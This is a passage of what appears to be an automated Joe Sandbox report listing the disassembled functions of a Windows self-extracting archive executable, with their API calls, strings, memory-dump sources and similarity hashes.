Part of subcall function 00DAD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
Part of subcall function 00DAD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
Part of subcall function 00DAD864: IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
Part of subcall function 00DAD864: TranslateMessage.USER32(?), ref: 00DAD8A8
Part of subcall function 00DAD864: DispatchMessageW.USER32(?), ref: 00DAD8B2

GetDlgItem.USER32(00000068,00DF3CF0), ref: 00DAF81F
ShowWindow.USER32(00000000,00000005,?,?,00DAD099,00000001,?,?,00DADAB9,00DC82F0,00DF3CF0,00DF3CF0,00001000,00DD50C4,00000000,?), ref: 00DAF844
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DAF853
SendMessageW.USER32(00000000,000000C2,00000000,00DC65F4), ref: 00DAF861
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DAF87B
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DAF895
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DAF8D9
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DAF8E4
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DAF8F7
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DAF91E
SendMessageW.USER32(00000000,000000C2,00000000,00DC769C), ref: 00DAF92D

Strings

\, xrefs: 00DAF885

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
String ID: \
API String ID: 3569833718-2967466578
Opcode ID: 61743b91ca538b4dc7c808dadba43c19cb2b40c16c8e2fe8f678431e93f177ce
Instruction ID: 57ff2140d76a8ea444cec05adb04519ed42640c84c1711afe216c82fc06e84f1
Opcode Fuzzy Hash: 61743b91ca538b4dc7c808dadba43c19cb2b40c16c8e2fe8f678431e93f177ce
Instruction Fuzzy Hash: AD319EB1649301BFE3109B24DC4AFBB7BACEB46704F044919F5A1DA2D1D7A45908CBB6

Function 00DAFAFC Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcslen.LIBCMT ref: 00DAFB35
ShellExecuteExW.SHELL32(?), ref: 00DAFC78
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00DAFCB0
GetExitCodeProcess.KERNEL32(?,?), ref: 00DAFCEC
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00DAFD12
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 00DAFD78

Strings

.exe, xrefs: 00DAFD1C
.inf, xrefs: 00DAFC34

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
String ID: .exe$.inf
API String ID: 36480843-3750412487
Opcode ID: 45729ee068ad0399d7355e1282bc6dad340fd0d12df2d371bcf2f37999d4ac74
Instruction ID: a83054ce60574b0a713d53e5f9645e0766a46c54dbc4935d4e881097d029c1d4
Opcode Fuzzy Hash: 45729ee068ad0399d7355e1282bc6dad340fd0d12df2d371bcf2f37999d4ac74
Instruction Fuzzy Hash: AD61C2311083849ADB319FA1D880ABBBBE5EF86744F0848ADF9C5D7291DB70D985C772

Function 00DBCFAB Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DB7F99,00DB7F99,?,?,?,00DBD1FC,00000001,00000001,62E85006), ref: 00DBD005
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DBD1FC,00000001,00000001,62E85006,?,?,?), ref: 00DBD08B
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DBD185
__freea.LIBCMT ref: 00DBD192

Part of subcall function 00DBBC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DB6A24,?,0000015D,?,?,?,?,00DB7F00,000000FF,00000000,?,?), ref: 00DBBCC0

__freea.LIBCMT ref: 00DBD19B
__freea.LIBCMT ref: 00DBD1C0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 6c357f476654f2a189d7b189f858a01382c7aeaecf166a2d29e2b94c3b3da86d
Instruction ID: 3907c1a7a8afb1f05fa12d7db6a029be2bfdb1467b4f70e5b06c077cd7c9712a
Opcode Fuzzy Hash: 6c357f476654f2a189d7b189f858a01382c7aeaecf166a2d29e2b94c3b3da86d
Instruction Fuzzy Hash: D1518072610316EBDB259E68CC41EFB77ABEB44790F194629FC06D6150EB34DC81C6B0

Function 00DACCD9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 34
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00DA28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00DA28D4
Part of subcall function 00DA28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00DA1309,Crypt32.dll,00000000,00DA1383,00000200,?,00DA1366,00000000,00000000,?), ref: 00DA28F4

OleInitialize.OLE32(00000000), ref: 00DACCF2
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DACD29
SHGetMalloc.SHELL32(00DDC460), ref: 00DACD33

Strings

3To, xrefs: 00DACD0A
riched20.dll, xrefs: 00DACCE1

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll$3To
API String ID: 3498096277-2168385784
Opcode ID: 7f7c350451b6cb8d270a0e02e285a62133829e201c21004bb99e2b1007028297
Instruction ID: d898e9c619b93e694c665ba0e65683b4b7c6935f3ee11bdefaeb96a4a4918f6a
Opcode Fuzzy Hash: 7f7c350451b6cb8d270a0e02e285a62133829e201c21004bb99e2b1007028297
Instruction Fuzzy Hash: 23F0F9B5D00209ABDB10AF9AD8499EFFBFCEF94704F00845AE415E2251DBB85649CBB1

Function 00D9B2B0 Relevance: 7.6, APIs: 5, Instructions: 119
filetimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00D98846,?,00000005), ref: 00D9B342
GetLastError.KERNEL32(?,?,00D98846,?,00000005), ref: 00D9B34F
CreateFileW.KERNEL32(?,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00D98846,?,00000005), ref: 00D9B382
GetLastError.KERNEL32(?,?,00D98846,?,00000005), ref: 00D9B38A
SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00D98846,?,00000005), ref: 00D9B3D9

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: File$CreateErrorLast$Time
String ID:
API String ID: 1999340476-0
Opcode ID: 2e6894e4983f485218fd782a5acfa102f1f39823ac7f97e37d30b913226a7bc2
Instruction ID: 74ddd0bd128da09d5595b452d751be3608648e0613bc8cfcdc3368f4f1cffb28
Opcode Fuzzy Hash: 2e6894e4983f485218fd782a5acfa102f1f39823ac7f97e37d30b913226a7bc2
Instruction Fuzzy Hash: D7413930545346AFDB20DF24EE45BAABBD4FF44320F150B1AF5A1962C0D7B09844CBB1

Function 00DAD864 Relevance: 7.5, APIs: 5, Instructions: 38
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DAD875
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DAD886
IsDialogMessageW.USER32(0001040E,?), ref: 00DAD89A
TranslateMessage.USER32(?), ref: 00DAD8A8
DispatchMessageW.USER32(?), ref: 00DAD8B2

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Message$DialogDispatchPeekTranslate
String ID:
API String ID: 1266772231-0
Opcode ID: 3ea2900450e4234ad1eaec87d1a14fd09b34543d6edc0e281b943c9a22623037
Instruction ID: 59cfe2a1b90c86150a8911aa70366e6d72ab83f8bb2b2b70339b8b5e75f88a19
Opcode Fuzzy Hash: 3ea2900450e4234ad1eaec87d1a14fd09b34543d6edc0e281b943c9a22623037
Instruction Fuzzy Hash: 61F0BD7190521AAB9B20ABB59C4CDEB7F7CEE06691B008415B516D2150EA28D505C7F0

Function 00DACB49 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00DACB6A
SHAutoComplete.SHLWAPI(?,00000010), ref: 00DACBA1

Part of subcall function 00DA4168: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00D9E084,00000000,.exe,?,?,00000800,?,?,?,00DAAD5D), ref: 00DA417E

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DACB91

Strings

EDIT, xrefs: 00DACB75, 00DACB80, 00DACB8D

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: 1e2d73c90ef47c6ab0839399320c672f0c15ddf7483f4cc9bb8873fc9f318a3e
Instruction ID: a9e508c826b8d995448541d3a4aa765fb48241487b95822504b2d1c6f6674131
Opcode Fuzzy Hash: 1e2d73c90ef47c6ab0839399320c672f0c15ddf7483f4cc9bb8873fc9f318a3e
Instruction Fuzzy Hash: 9EF04435A01314BBDB209B25DD06FAFB7ACDF96710F054055B941F7280DBB0DA05CAB5

Function 00DAFFDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00DAFFFE
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00DB0038

Strings

sfxpar, xrefs: 00DB0033
sfxcmd, xrefs: 00DAFFF9

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: 77bbf166f99eff31205843662b092465b8378cbf211d46f5728c9041f253881e
Instruction ID: 2d387abd5eca9b4e461845e12f0c2b7bfe5e68431b383859293545e912a8934c
Opcode Fuzzy Hash: 77bbf166f99eff31205843662b092465b8378cbf211d46f5728c9041f253881e
Instruction Fuzzy Hash: 17F09671901325EBCB20AB958C15EFF77ACDF1EB41744005AB942D7241DAB5DD40D6B1

Function 00DB6232 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000011,00000000,00000800,?,00DB61E3,00000000,00000001,00DF60C8,?,?,?,00DB6386,00000004,InitializeCriticalSectionEx,00DC9624,InitializeCriticalSectionEx), ref: 00DB623F
GetLastError.KERNEL32(?,00DB61E3,00000000,00000001,00DF60C8,?,?,?,00DB6386,00000004,InitializeCriticalSectionEx,00DC9624,InitializeCriticalSectionEx,00000000,?,00DB613D), ref: 00DB6249
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,00DB5083), ref: 00DB6271

Strings

api-ms-, xrefs: 00DB6256

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: a75b00aa0bd22f893ff5283e3aa9749a218c679479f892180b2b7a385bd520ee
Instruction ID: 8c9b8862dc132d4a46574ec1ffb9fe4cc9466544e0165383143fb7d9abddf7f5
Opcode Fuzzy Hash: a75b00aa0bd22f893ff5283e3aa9749a218c679479f892180b2b7a385bd520ee
Instruction Fuzzy Hash: 23E09A34680306FBEF111B61EC06FA97A69EB10B51F144424FA0EE81E1DBA5DD5199A8

Function 00D9B151 Relevance: 6.1, APIs: 4, Instructions: 56
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetStdHandle.KERNEL32(000000F6,?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B161
ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B179
GetLastError.KERNEL32(?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B1AB
GetLastError.KERNEL32(?,?,?,00000000,00D9B662,?,?,00000000,?,?), ref: 00D9B1CA

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: 9a14cda3347e0b51c83cf1ecb468b5838e2a75584e0c723746fb4c10859b3c3e
Instruction ID: cae98c75d6337a2d0bdf778fb2203cf0a4bc0f3f2103d7f575db04250b380279
Opcode Fuzzy Hash: 9a14cda3347e0b51c83cf1ecb468b5838e2a75584e0c723746fb4c10859b3c3e
Instruction Fuzzy Hash: 3911AC30900309EBDF205F20EA18A6A37A9FB413B1F15862BE866F5290D770DE449B71

Function 00DBD384 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00DB688D,00000000,00000000,?,00DBD32B,00DB688D,00000000,00000000,00000000,?,00DBD528,00000006,FlsSetValue), ref: 00DBD3B6
GetLastError.KERNEL32(?,00DBD32B,00DB688D,00000000,00000000,00000000,?,00DBD528,00000006,FlsSetValue,00DCAC00,FlsSetValue,00000000,00000364,?,00DBBA77), ref: 00DBD3C2
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00DBD32B,00DB688D,00000000,00000000,00000000,?,00DBD528,00000006,FlsSetValue,00DCAC00,FlsSetValue,00000000), ref: 00DBD3D0

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: adc828e59ba9fbb8f0921484617530030efc63bb2f04a9bf460a709d780c0556
Instruction ID: bee540e5a152a27e172b21fe4daa0fd7185d17a0e82486ee68e8980af0d34de3
Opcode Fuzzy Hash: adc828e59ba9fbb8f0921484617530030efc63bb2f04a9bf460a709d780c0556
Instruction Fuzzy Hash: E801F736651327EBCB214B699C44E977BD9EF04BA17190620F957D7381EB20D801CAF1

Function 00DA3105 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00010000,Function_00013240,?,00000000,?), ref: 00DA3129
SetThreadPriority.KERNEL32(00000000,00000000), ref: 00DA3170

Part of subcall function 00D97BAD: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D97BD5

Strings

CreateThread failed, xrefs: 00DA3135

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: Thread$CreatePriority__vswprintf_c_l
String ID: CreateThread failed
API String ID: 2655393344-3849766595
Opcode ID: c8102cab076e58e8b96e722b21adead924fb105a813bc1730deaa5914053aa15
Instruction ID: 507dfbacc4222dd41d0e71d66d818148ae47cb7e23fedb876d3914f347bcb768
Opcode Fuzzy Hash: c8102cab076e58e8b96e722b21adead924fb105a813bc1730deaa5914053aa15
Instruction Fuzzy Hash: 2801F4B17487077FD7247F54EC82FB677A9EB42712F20012EF682A72C0CAA0A8458774

Function 00D9B9BA Relevance: 4.6, APIs: 3, Instructions: 111fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F5,?,?,?,?,00D9F306,00000001,?,?,?,00000000,00DA7564,?,?,?,?), ref: 00D9B9DE
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00D9BA25
WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00D9F306,00000001,?,?,?), ref: 00D9BA51

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: FileWrite$Handle
String ID:
API String ID: 4209713984-0
Opcode ID: 1a4340d98e57cc100207174dfc38d52658a56087ba05f15c205a8f90e046b0b2
Instruction ID: 988f8198827e6f27e43588b508cc25b16d741e7acc396fb833dea78969f23ac5
Opcode Fuzzy Hash: 1a4340d98e57cc100207174dfc38d52658a56087ba05f15c205a8f90e046b0b2
Instruction Fuzzy Hash: B231A271208306AFDF14CF24EA48B6A77A5FF81725F15461EF581A7290CBB49D48CBB2

Function 00D9BEE1 Relevance: 4.6, APIs: 3, Instructions: 61COMMON

Download Yara Rule

APIs

Part of subcall function 00D9E1EC: _wcslen.LIBCMT ref: 00D9E1F2

CreateDirectoryW.KERNELBASE(?,00000000,?,?,00000000,00D9BBD0,?,00000001,00000000,?,?), ref: 00D9BF12
CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,00000000,00D9BBD0,?,00000001,00000000,?,?), ref: 00D9BF45
GetLastError.KERNEL32(?,?,?,00000000,00D9BBD0,?,00000001,00000000,?,?), ref: 00D9BF62

Memory Dump Source

Source File: 00000000.00000002.1684528239.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000000.00000002.1684491923.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DD9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684619235.0000000000DF6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1684736589.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d90000_8Ck8T5qRcC.jbxd

Similarity

API ID: CreateDirectory$ErrorLast_wcslen
String ID:
API String ID: 2260680371-0
Opcode ID: 024e261ade3adf245cbd7f203bf2af8f4640cb53bab4cfc28383fbb533851795
Instruction ID: 3c872930c16b612a5fa12ad97285fc7a5f74d46bbcae04691fe01abef294d44c
Opcode Fuzzy Hash: 024e261ade3adf245cbd7f203bf2af8f4640cb53bab4cfc28383fbb533851795
Instruction Fuzzy Hash: 50110431200319AADF21AF70AE45BFE73A8DF09710F094456F902E7191DB65DE81CA75

Function 00DBDEE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00DBDF08

Strings

, xrefs: 00DBDF4D

Memory Dump Source

